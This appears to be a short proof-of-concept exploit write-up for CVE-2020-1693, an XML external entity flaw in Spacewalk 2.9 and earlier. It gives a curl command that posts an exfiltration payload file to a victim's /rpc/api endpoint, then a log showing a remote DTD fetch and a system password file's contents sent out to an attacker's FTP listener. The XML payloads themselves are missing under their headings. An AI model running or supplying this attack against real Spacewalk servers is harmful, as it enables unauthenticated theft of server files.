Proof of Concept exploit for CVE-2020-1693 – Spacewalk <= 2.9 XXE

CVE Description
A flaw was found in Spacewalk up to version 2.9 where it was vulnerable to XML internal entity attacks via the /rpc/api endpoint. An unauthenticated remote attacker could use this flaw to retrieve the content of certain files and trigger a denial of service, or in certain circumstances, execute arbitrary code on the Spacewalk server.

Local file read

External DTD:

XML-RPC call for final exploit

curl -X POST -sik https://victim.tld/rpc/api -H ‘Content-Type: application/xml’ –data @xxe-ftp-exfil.xml

After execution and running an FTP listener, you will see the remote DTD fetch, along with the following exfiltration of the local file.

"GET /external.dtd HTTP/1.1" 200 448 "-" "Java/1.8.0_151"

2020/02/17 00:00:00 [*] Connection Accepted from [x.x.x.x:00000]
USER: anonymous
PASS: [email protected]
/root:x:0:0:root:
/root:
/bin
2020/02/17 00:00:00 [*] Closing FTP Connection